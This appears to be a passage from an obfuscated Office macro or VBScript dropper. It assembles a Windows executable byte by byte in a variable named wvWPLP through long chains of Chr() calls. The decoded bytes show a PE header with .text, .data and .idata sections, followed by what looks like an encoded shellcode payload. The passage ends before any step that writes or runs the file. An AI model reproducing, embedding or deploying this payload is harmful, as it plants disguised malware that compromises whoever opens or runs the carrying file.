wvWPLP=wvWPLP&Chr(32)&Chr(114)&Chr(117)&Chr(110)&Chr(32)&Chr(105)&Chr(110)&Chr(32)&Chr(68)&Chr(79)&Chr(83)&Chr(32)&Chr(109)&Chr(111)&Chr(100)&Chr(101)&Chr(46)&Chr(13)&Chr(13)&Chr(10)&Chr(36)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(80)&Chr(69)&Chr(0)&Chr(0)&Chr(76)&Chr(1)&Chr(3)&Chr(0)&Chr(97)&Chr(144)&Chr(140)&Chr(129)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(224)&Chr(0)&Chr(15)&Chr(3)&Chr(11)&Chr(1)&Chr(2)&Chr(56)&Chr(0)&Chr(2)&Chr(0)&Chr(0)&Chr(0)&Chr(14)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(16)&Chr(0)&Chr(0)&Chr(0)&Chr(16)&Chr(0)&Chr(0)&Chr(0)&Chr(32)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(64)&Chr(0)&Chr(0)&Chr(16)&Chr(0)&Chr(0)&Chr(0)&Chr(2)&Chr(0)&Chr(0)&Chr(4)&Chr(0)&Chr(0)&Chr(0)&Chr(1)&Chr(0)&Chr(0)&Chr(0)
wvWPLP=wvWPLP&Chr(4)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(64)&Chr(0)&Chr(0)&Chr(0)&Chr(2)&Chr(0)&Chr(0)&Chr(70)&Chr(58)&Chr(0)&Chr(0)&Chr(2)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(32)&Chr(0)&Chr(0)&Chr(16)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(16)&Chr(0)&Chr(0)&Chr(16)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(16)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(48)&Chr(0)&Chr(0)&Chr(100)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)
wvWPLP=wvWPLP&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(46)&Chr(116)&Chr(101)&Chr(120)&Chr(116)&Chr(0)&Chr(0)&Chr(0)&Chr(40)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(16)&Chr(0)&Chr(0)&Chr(0)&Chr(2)&Chr(0)&Chr(0)&Chr(0)&Chr(2)&Chr(0)&Chr(0)
wvWPLP=wvWPLP&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(32)&Chr(0)&Chr(48)&Chr(96)&Chr(46)&Chr(100)&Chr(97)&Chr(116)&Chr(97)&Chr(0)&Chr(0)&Chr(0)&Chr(144)&Chr(10)&Chr(0)&Chr(0)&Chr(0)&Chr(32)&Chr(0)&Chr(0)&Chr(0)&Chr(12)&Chr(0)&Chr(0)&Chr(0)&Chr(4)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(32)&Chr(0)&Chr(48)&Chr(224)&Chr(46)&Chr(105)&Chr(100)&Chr(97)&Chr(116)&Chr(97)&Chr(0)&Chr(0)&Chr(100)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(48)&Chr(0)&Chr(0)&Chr(0)&Chr(2)&Chr(0)&Chr(0)&Chr(0)&Chr(16)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(64)&Chr(0)&Chr(48)&Chr(192)&Chr(0)&Chr(0)&Chr(0)&Chr(0)
wvWPLP=wvWPLP&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(184)&Chr(0)&Chr(32)&Chr(64)&Chr(0)&Chr(255)&Chr(224)&Chr(144)&Chr(255)&Chr(37)&Chr(56)&Chr(48)&Chr(64)&Chr(0)&Chr(144)&Chr(144)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(255)&Chr(255)&Chr(255)&Chr(255)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(255)&Chr(255)&Chr(255)&Chr(255)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)
wvWPLP=wvWPLP&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)
wvWPLP=wvWPLP&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)
wvWPLP=wvWPLP&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)
wvWPLP=wvWPLP&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)
wvWPLP=wvWPLP&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(190)&Chr(101)&Chr(81)&Chr(244)&Chr(228)&Chr(221)&Chr(199)&Chr(217)&Chr(116)&Chr(36)&Chr(244)&Chr(95)&Chr(49)&Chr(201)&Chr(102)&Chr(185)&Chr(4)&Chr(2)&Chr(49)&Chr(119)&Chr(21)&Chr(3)&Chr(119)&Chr(21)&Chr(131)&Chr(199)&Chr(97)&Chr(179)&Chr(1)&Chr(213)&Chr(169)&Chr(91)&Chr(226)&Chr(6)&Chr(105)&Chr(156)&Chr(150)&Chr(217)&Chr(89)&Chr(248)&Chr(223)&Chr(6)&Chr(101)&Chr(232)&Chr(98)&Chr(70)&Chr(149)&Chr(233)&Chr(2)&Chr(206)&Chr(112)&Chr(216)&Chr(2)&Chr(180)&Chr(241)&Chr(75)&Chr(179)&Chr(190)&Chr(87)&Chr(96)&Chr(56)&Chr(146)&Chr(67)&Chr(243)&Chr(76)&Chr(59)&Chr(100)&Chr(180)&Chr(251)&Chr(29)&Chr(75)&Chr(69)&Chr(87)&Chr(93)&Chr(202)&Chr(197)
wvWPLP=wvWPLP&Chr(170)&Chr(178)&Chr(44)&Chr(247)&Chr(100)&Chr(199)&Chr(45)&Chr(48)&Chr(152)&Chr(42)&Chr(127)&Chr(233)&Chr(214)&Chr(153)&Chr(111)&Chr(158)&Chr(163)&Chr(33)&Chr(4)&Chr(236)&Chr(34)&Chr(34)&Chr(249)&Chr(165)&Chr(69)&Chr(3)&Chr(172)&Chr(190)&Chr(31)&Chr(131)&Chr(79)&Chr(18)&Chr(20)&Chr(138)&Chr(87)&Chr(119)&Chr(17)&Chr(68)&Chr(236)&Chr(67)&Chr(237)&Chr(87)&Chr(36)&Chr(154)&Chr(14)&Chr(251)&Chr(9)&Chr(18)&Chr(253)&Chr(5)&Chr(78)&Chr(149)&Chr(30)&Chr(112)&Chr(166)&Chr(229)&Chr(163)&Chr(131)&Chr(125)&Chr(151)&Chr(127)&Chr(1)&Chr(101)&Chr(63)&Chr(11)&Chr(177)&Chr(65)&Chr(193)&Chr(216)&Chr(36)&Chr(2)&Chr(205)&Chr(149)&Chr(35)&Chr(76)&Chr(210)&Chr(40)&Chr(231)&Chr(231)&Chr(238)&Chr(161)&Chr(6)&Chr(39)&Chr(103)&Chr(241)&Chr(44)&Chr(227)&Chr(35)&Chr(161)&Chr(77)&Chr(178)&Chr(137)&Chr(4)&Chr(113)&Chr(164)&Chr(113)&Chr(248)&Chr(215)&Chr(175)&Chr(156)
wvWPLP=wvWPLP&Chr(237)&Chr(101)&Chr(242)&Chr(200)&Chr(194)&Chr(71)&Chr(12)&Chr(9)&Chr(77)&Chr(223)&Chr(127)&Chr(59)&Chr(210)&Chr(75)&Chr(23)&Chr(119)&Chr(155)&Chr(85)&Chr(224)&Chr(14)&Chr(139)&Chr(101)&Chr(62)&Chr(168)&Chr(220)&Chr(155)&Chr(190)&Chr(201)&Chr(245)&Chr(95)&Chr(234)&Chr(153)&Chr(109)&Chr(73)&Chr(146)&Chr(113)&Chr(110)&Chr(118)&Chr(71)&Chr(239)&Chr(100)&Chr(224)&Chr(167)&Chr(88)&Chr(83)&Chr(2)&Chr(79)&Chr(155)&Chr(164)&Chr(243)&Chr(211)&Chr(18)&Chr(66)&Chr(163)&Chr(187)&Chr(116)&Chr(219)&Chr(4)&Chr(107)&Chr(53)&Chr(139)&Chr(236)&Chr(97)&Chr(186)&Chr(244)&Chr(13)&Chr(138)&Chr(16)&Chr(157)&Chr(164)&Chr(100)&Chr(205)&Chr(245)&Chr(80)&Chr(29)&Chr(84)&Chr(141)&Chr(193)&Chr(226)&Chr(66)&Chr(235)&Chr(194)&Chr(104)&Chr(103)&Chr(11)&Chr(140)&Chr(152)&Chr(2)&Chr(31)&Chr(249)&Chr(255)&Chr(236)&Chr(223)&Chr(250)&Chr(149)&Chr(236)&Chr(181)&Chr(254)&Chr(63)&Chr(186)
wvWPLP=wvWPLP&Chr(33)&Chr(253)&Chr(102)&Chr(140)&Chr(237)&Chr(254)&Chr(77)&Chr(142)&Chr(234)&Chr(1)&Chr(19)&Chr(167)&Chr(129)&Chr(52)&Chr(129)&Chr(135)&Chr(253)&Chr(56)&Chr(69)&Chr(8)&Chr(254)&Chr(110)&Chr(15)&Chr(8)&Chr(150)&Chr(214)&Chr(107)&Chr(91)&Chr(131)&Chr(24)&Chr(166)&Chr(207)&Chr(24)&Chr(141)&Chr(72)&Chr(166)&Chr(205)&Chr(6)&Chr(32)&Chr(68)&Chr(43)&Chr(96)&Chr(239)&Chr(183)&Chr(30)&Chr(242)&Chr(247)&Chr(72)&Chr(220)&Chr(221)&Chr(95)&Chr(33)&Chr(30)&Chr(94)&Chr(95)&Chr(177)&Chr(116)&Chr(94)&Chr(15)&Chr(217)&Chr(131)&Chr(113)&Chr(160)&Chr(41)&Chr(107)&Chr(88)&Chr(233)&Chr(33)&Chr(230)&Chr(13)&Chr(88)&Chr(211)&Chr(247)&Chr(7)&Chr(60)&Chr(77)&Chr(247)&Chr(164)&Chr(228)&Chr(126)&Chr(130)&Chr(197)&Chr(27)&Chr(127)&Chr(115)&Chr(204)&Chr(120)&Chr(127)&Chr(115)&Chr(240)&Chr(127)&Chr(67)&Chr(165)&Chr(201)&Chr(10)&Chr(130)&Chr(117)&Chr(110)&Chr(4)&Chr(177)
wvWPLP=wvWPLP&Chr(216)&Chr(199)&Chr(142)&Chr(186)&Chr(79)&Chr(23)&Chr(155)&Chr(216)&Chr(243)&Chr(139)&Chr(45)&Chr(122)&Chr(3)&Chr(219)&Chr(41)&Chr(204)&Chr(172)&Chr(252)&Chr(226)&Chr(254)&Chr(31)&Chr(68)&Chr(176)&Chr(171)&Chr(187)&Chr(179)&Chr(7)&Chr(101)&Chr(40)&Chr(19)&Chr(241)&Chr(206)&Chr(233)&Chr(170)&Chr(162)&Chr(130)&Chr(243)&Chr(46)&Chr(241)&Chr(31)&Chr(166)&Chr(227)&Chr(79)&Chr(218)&Chr(155)&Chr(23)&Chr(216)&Chr(77)&Chr(13)&Chr(29)&Chr(233)&Chr(245)&Chr(118)&Chr(75)&Chr(17)&Chr(93)&Chr(97)&Chr(210)&Chr(181)&Chr(130)&Chr(180)&Chr(249)&Chr(123)&Chr(71)&Chr(184)&Chr(118)&Chr(249)&Chr(201)&Chr(231)&Chr(125)&Chr(151)&Chr(72)&Chr(157)&Chr(75)&Chr(41)&Chr(139)&Chr(112)&Chr(44)&Chr(181)&Chr(145)&Chr(197)&Chr(211)&Chr(247)&Chr(1)&Chr(34)&Chr(209)&Chr(67)&Chr(164)&Chr(233)&Chr(33)&Chr(82)&Chr(224)&Chr(101)&Chr(59)&Chr(177)&Chr(181)&Chr(208)&Chr(202)&Chr(205)&Chr(66)
wvWPLP=wvWPLP&Chr(50)&Chr(53)&Chr(181)&Chr(169)&Chr(48)&Chr(229)&Chr(163)&Chr(77)&Chr(164)&Chr(123)&Chr(164)&Chr(64)&Chr(219)&Chr(111)&Chr(224)&Chr(32)&Chr(191)&Chr(171)&Chr(58)&Chr(166)&Chr(181)&Chr(240)&Chr(62)&Chr(98)&Chr(207)&Chr(160)&Chr(94)&Chr(255)&Chr(211)&Chr(200)&Chr(147)&Chr(102)&Chr(104)&Chr(92)&Chr(178)&Chr(210)&Chr(138)&Chr(51)&Chr(3)&Chr(27)&Chr(244)&Chr(110)&Chr(214)&Chr(166)&Chr(52)&Chr(175)&Chr(168)&Chr(115)&Chr(191)&Chr(80)&Chr(54)&Chr(30)&Chr(166)&Chr(127)&Chr(37)&Chr(209)&Chr(112)&Chr(103)&Chr(141)&Chr(204)&Chr(82)&Chr(0)&Chr(255)&Chr(79)&Chr(9)&Chr(26)&Chr(0)&Chr(82)&Chr(121)&Chr(55)&Chr(50)&Chr(25)&Chr(248)&Chr(220)&Chr(8)&Chr(22)&Chr(129)&Chr(147)&Chr(93)&Chr(71)&Chr(146)&Chr(142)&Chr(170)&Chr(107)&Chr(223)&Chr(110)&Chr(86)&Chr(181)&Chr(178)&Chr(48)&Chr(125)&Chr(179)&Chr(63)&Chr(216)&Chr(201)&Chr(72)&Chr(21)&Chr(26)&Chr(172)&Chr(248)
wvWPLP=wvWPLP&Chr(222)&Chr(164)&Chr(1)&Chr(147)&Chr(215)&Chr(120)&Chr(59)&Chr(103)&Chr(95)&Chr(232)&Chr(56)&Chr(138)&Chr(17)&Chr(194)&Chr(223)&Chr(51)&Chr(210)&Chr(21)&Chr(7)&Chr(208)&Chr(167)&Chr(1)&Chr(57)&Chr(43)&Chr(242)&Chr(79)&Chr(15)&Chr(147)&Chr(234)&Chr(19)&Chr(204)&Chr(218)&Chr(162)&Chr(124)&Chr(63)&Chr(69)&Chr(75)&Chr(117)&Chr(183)&Chr(72)&Chr(223)&Chr(103)&Chr(23)&Chr(214)&Chr(162)&Chr(225)&Chr(103)&Chr(115)&Chr(88)&Chr(113)&Chr(17)&Chr(11)&Chr(50)&Chr(234)&Chr(70)&Chr(67)&Chr(50)&Chr(232)&Chr(62)&Chr(18)&Chr(152)&Chr(142)&Chr(197)&Chr(106)&Chr(93)&Chr(50)&Chr(8)&Chr(198)&Chr(225)&Chr(13)&Chr(109)&Chr(252)&Chr(73)&Chr(151)&Chr(153)&Chr(127)&Chr(127)&Chr(69)&Chr(186)&Chr(8)&Chr(232)&Chr(98)&Chr(79)&Chr(63)&Chr(153)&Chr(156)&Chr(143)&Chr(225)&Chr(170)&Chr(254)&Chr(254)&Chr(162)&Chr(235)&Chr(221)&Chr(217)&Chr(142)&Chr(129)&Chr(74)&Chr(46)&Chr(112)
wvWPLP=wvWPLP&Chr(161)&Chr(110)&Chr(25)&Chr(81)&Chr(253)&Chr(154)&Chr(98)&Chr(175)&Chr(106)&Chr(6)&Chr(122)&Chr(40)&Chr(89)&Chr(165)&Chr(26)&Chr(152)&Chr(120)&Chr(243)&Chr(105)&Chr(249)&Chr(170)&Chr(215)&Chr(116)&Chr(161)&Chr(118)&Chr(117)&Chr(6)&Chr(40)&Chr(246)&Chr(190)&Chr(242)&Chr(157)&Chr(39)&Chr(121)&Chr(253)&Chr(100)&Chr(44)&Chr(179)&Chr(60)&Chr(95)&Chr(90)&Chr(248)&Chr(181)&Chr(238)&Chr(24)&Chr(40)&Chr(247)&Chr(134)&Chr(234)&Chr(88)&Chr(195)&Chr(234)&Chr(121)&Chr(31)&Chr(176)&Chr(11)&Chr(68)&Chr(142)&Chr(149)&Chr(93)&Chr(252)&Chr(212)&Chr(86)&Chr(73)&Chr(77)&Chr(38)&Chr(81)&Chr(24)&Chr(68)&Chr(160)&Chr(226)&Chr(19)&Chr(100)&Chr(99)&Chr(10)&Chr(205)&Chr(76)&Chr(86)&Chr(76)&Chr(126)&Chr(228)&Chr(246)&Chr(175)&Chr(107)&Chr(39)&Chr(137)&Chr(254)&Chr(140)&Chr(60)&Chr(29)&Chr(112)&Chr(111)&Chr(118)&Chr(42)&Chr(193)&Chr(68)&Chr(252)&Chr(57)&Chr(191)&Chr(136)
wvWPLP=wvWPLP&Chr(152)&Chr(180)&Chr(239)&Chr(142)&Chr(103)&Chr(225)&Chr(33)&Chr(1)&Chr(25)&Chr(38)&Chr(181)&Chr(87)&Chr(205)&Chr(123)&Chr(154)&Chr(144)&Chr(129)&Chr(14)&Chr(17)&Chr(96)&Chr(7)&Chr(144)&Chr(16)&Chr(226)&Chr(176)&Chr(66)&Chr(242)&Chr(93)&Chr(177)&Chr(220)&Chr(112)&Chr(41)&Chr(24)&Chr(180)&Chr(206)&Chr(91)&Chr(246)&Chr(14)&Chr(217)&Chr(194)&Chr(29)&Chr(151)&Chr(136)&Chr(26)&Chr(169)&Chr(145)&Chr(50)&Chr(224)&Chr(65)&Chr(180)&Chr(73)&Chr(204)&Chr(214)&Chr(230)&Chr(209)&Chr(251)&Chr(96)&Chr(178)&Chr(53)&Chr(232)&Chr(47)&Chr(183)&Chr(179)&Chr(125)&Chr(197)&Chr(58)&Chr(95)&Chr(248)&Chr(85)&Chr(176)&Chr(80)&Chr(113)&Chr(47)&Chr(244)&Chr(10)&Chr(6)&Chr(67)&Chr(191)&Chr(107)&Chr(191)&Chr(234)&Chr(34)&Chr(2)&Chr(12)&Chr(160)&Chr(199)&Chr(50)&Chr(54)&Chr(82)&Chr(54)&Chr(42)&Chr(221)&Chr(38)&Chr(115)&Chr(149)&Chr(5)&Chr(112)&Chr(166)&Chr(233)&Chr(3)
wvWPLP=wvWPLP&Chr(41)&Chr(9)&Chr(252)&Chr(185)&Chr(54)&Chr(244)&Chr(186)&Chr(241)&Chr(126)&Chr(46)&Chr(80)&Chr(4)&Chr(3)&Chr(152)&Chr(49)&Chr(179)&Chr(200)&Chr(104)&Chr(56)&Chr(149)&Chr(125)&Chr(103)&Chr(148)&Chr(9)&Chr(102)&Chr(147)&Chr(227)&Chr(255)&Chr(85)&Chr(57)&Chr(190)&Chr(161)&Chr(99)&Chr(133)&Chr(46)&Chr(208)&Chr(93)&Chr(115)&Chr(78)&Chr(87)&Chr(225)&Chr(132)&Chr(173)&Chr(198)&Chr(89)&Chr(133)&Chr(194)&Chr(113)&Chr(88)&Chr(88)&Chr(228)&Chr(134)&Chr(80)&Chr(176)&Chr(94)&Chr(42)&Chr(142)&Chr(19)&Chr(233)&Chr(98)&Chr(234)&Chr(202)&Chr(56)&Chr(228)&Chr(127)&Chr(5)&Chr(51)&Chr(54)&Chr(72)&Chr(86)&Chr(174)&Chr(61)&Chr(167)&Chr(124)&Chr(66)&Chr(169)&Chr(159)&Chr(195)&Chr(86)&Chr(170)&Chr(227)&Chr(89)&Chr(48)&Chr(20)&Chr(249)&Chr(158)&Chr(20)&Chr(42)&Chr(130)&Chr(159)&Chr(115)&Chr(185)&Chr(223)&Chr(69)&Chr(53)&Chr(252)&Chr(51)&Chr(20)&Chr(47)&Chr(177)
wvWPLP=wvWPLP&Chr(23)&Chr(130)&Chr(38)&Chr(166)&Chr(90)&Chr(126)&Chr(243)&Chr(202)&Chr(243)&Chr(254)&Chr(252)&Chr(195)&Chr(174)&Chr(62)&Chr(109)&Chr(186)&Chr(231)&Chr(115)&Chr(77)&Chr(26)&Chr(253)&Chr(179)&Chr(195)&Chr(54)&Chr(34)&Chr(69)&Chr(40)&Chr(139)&Chr(92)&Chr(68)&Chr(187)&Chr(17)&Chr(121)&Chr(69)&Chr(118)&Chr(194)&Chr(119)&Chr(191)&Chr(97)&Chr(108)&Chr(55)&Chr(30)&Chr(226)&Chr(100)&Chr(52)&Chr(195)&Chr(238)&Chr(55)&Chr(144)&Chr(177)&Chr(222)&Chr(61)&Chr(1)&Chr(209)&Chr(83)&Chr(41)&Chr(93)&Chr(22)&Chr(55)&Chr(24)&Chr(81)&Chr(75)&Chr(127)&Chr(198)&Chr(161)&Chr(15)&Chr(34)&Chr(232)&Chr(188)&Chr(202)&Chr(10)&Chr(194)&Chr(163)&Chr(219)&Chr(51)&Chr(116)&Chr(139)&Chr(228)&Chr(75)&Chr(120)&Chr(99)&Chr(81)&Chr(72)&Chr(177)&Chr(229)&Chr(197)&Chr(79)&Chr(171)&Chr(225)&Chr(253)&Chr(132)&Chr(41)&Chr(235)&Chr(75)&Chr(142)&Chr(80)&Chr(131)&Chr(116)&Chr(244)&Chr(109)
wvWPLP=wvWPLP&Chr(181)&Chr(113)&Chr(230)&Chr(145)&Chr(64)&Chr(197)&Chr(117)&Chr(181)&Chr(84)&Chr(209)&Chr(226)&Chr(22)&Chr(146)&Chr(89)&Chr(182)&Chr(6)&Chr(159)&Chr(250)&Chr(138)&Chr(80)&Chr(88)&Chr(231)&Chr(63)&Chr(80)&Chr(19)&Chr(249)&Chr(241)&Chr(180)&Chr(163)&Chr(87)&Chr(160)&Chr(206)&Chr(88)&Chr(118)&Chr(15)&Chr(196)&Chr(168)&Chr(193)&Chr(92)&Chr(182)&Chr(156)&Chr(79)&Chr(137)&Chr(155)&Chr(162)&Chr(112)&Chr(132)&Chr(228)&Chr(93)&Chr(57)&Chr(205)&Chr(40)&Chr(83)&Chr(234)&Chr(153)&Chr(214)&Chr(185)&Chr(255)&Chr(40)&Chr(170)&Chr(102)&Chr(49)&Chr(253)&Chr(129)&Chr(54)&Chr(195)&Chr(192)&Chr(123)&Chr(196)&Chr(121)&Chr(5)&Chr(91)&Chr(154)&Chr(73)&Chr(79)&Chr(37)&Chr(106)&Chr(11)&Chr(60)&Chr(72)&Chr(251)&Chr(100)&Chr(98)&Chr(3)&Chr(56)&Chr(251)&Chr(4)&Chr(37)&Chr(160)&Chr(40)&Chr(111)&Chr(81)&Chr(137)&Chr(79)&Chr(81)&Chr(6)&Chr(104)&Chr(204)&Chr(47)&Chr(19)
